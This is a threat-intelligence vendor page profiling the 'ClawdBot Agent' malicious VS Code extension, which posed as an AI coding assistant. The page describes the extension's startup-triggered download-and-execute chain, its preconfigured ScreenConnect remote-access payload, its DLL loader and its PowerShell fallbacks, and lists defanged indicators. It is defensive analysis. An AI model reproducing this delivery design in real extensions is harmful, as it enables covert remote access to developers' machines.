Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
Malware

ClawdBot Agent

ClawdBot Agent is a malicious Visual Studio Code extension discovered on 2026-01-27 that masqueraded as a legitimate AI coding assistant associated with Clawdbot. The real Clawdbot service had not released an official VS Code extension. The extension was described as a fully functional trojan: it presented a polished UI and integrated with AI providers including OpenAI, Anthropic, Google, Ollama, Groq, Mistral, and OpenRouter, while silently deploying malware onto Windows systems when VS Code started.

The extension abused the VS Code activation event "onStartupFinished" so its malicious logic executed automatically at launch. Its activate() flow called initCore(), which fetched remote configuration from http://clawdbot.getintwopc[.]site/config.json and then downloaded and executed payloads. Errors were suppressed with an empty catch block to avoid visible failures. Payloads were staged under %TEMP%\Lightshot and launched as hidden, detached processes.

The primary payload was Code.exe (SHA-256: e20b920c7af988aa215c95bbaa365d005dd673544ab7e3577b60fecf11dcdea2), identified as a legitimate ConnectWise ScreenConnect client installer that had been preconfigured to connect to attacker-controlled infrastructure at meeting.bulletmailer[.]net:8041. When executed, it installed to C:\Program Files (x86)\ScreenConnect Client (083e4d30c7ea44f7)\ and deployed components including ScreenConnect.ClientService.exe, ScreenConnect.WindowsBackstageShell.exe, and ScreenConnect.WindowsFileManager.exe, enabling remote access to victim machines.

A secondary delivery path used a malicious Rust-based DWrite.dll (SHA-256: d1e0c26774cb8beabaf64f119652719f673fb530368d5b2166178191ad5fcbea) that exported DWriteCreateFactory to mimic the legitimate DirectWrite interface. This DLL implemented a download-write-execute chain via WinINet APIs and retrieved a payload from a Dropbox URL ending in zoomupdate.msi, disguised as a Zoom update; the downloaded file had the same SHA-256 as Code.exe. Additional fallback mechanisms included JavaScript download paths for Lightshot.exe and Lightshot.dll from clawdbot.getintwopc[.]site and a batch-script/PowerShell fallback that downloaded Lightshot.exe from https://darkgptprivate[.]com/d111.

The campaign used multiple layers of redundancy and brand impersonation, including Clawdbot, VS Code, Lightshot, and Zoom, to reduce suspicion and maintain delivery if infrastructure was disrupted. Reported infrastructure included clawdbot.getintwopc[.]site, meeting.bulletmailer[.]net:8041, darkgptprivate[.]com, and 178.16.54[.]253. Microsoft was notified and removed the malicious extension from the marketplace. At the time of removal, the extension reportedly had 21 installs.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
ACTIVITY FEED

Recent activity

3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

3 SOURCESView more in app
cyber security newsNews
Jan 29, 2026
Beware of Weaponized VS Code Extension Named ClawdBot Agent that Deploys ScreenConnect RAT

A trojanized Visual Studio Code extension impersonating an AI assistant. It executes automatically on VS Code startup, contacts an external server for configuration, and downloads/executes multiple payloads disguised as legitimate system components. It ultimately deploys remote access capability (ScreenConnect) and uses redundant/fallback payload delivery (including a Rust-based DLL fetching backups from Dropbox disguised as a Zoom update).

Read more
security online infoNews
Jan 29, 2026
Fake AI Assistant: Malicious "ClawdBot" Extension Hides Trojan in VS Code

A malicious Visual Studio Code extension that functions as a legitimate-looking AI coding assistant while silently downloading and dropping a payload onto Windows hosts at VS Code startup. The payload is disguised as benign executables (e.g., Lightshot.exe or an Electron bundle Code.exe) and uses command-and-control infrastructure with redundancy (Cloudflare-masked primary plus backups, including PowerShell fallback).

Read more
aikido dev blogNews
Jan 27, 2026
Fake Clawdbot VS Code Extension Installs ScreenConnect RAT

Malicious VS Code extension impersonating an AI coding assistant. Auto-executes on VS Code startup, retrieves configuration from attacker infrastructure, and drops/executes payloads (including a weaponized ScreenConnect installer and a malicious DLL loader), with multiple fallback download paths (alternate URLs/domains and PowerShell).

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.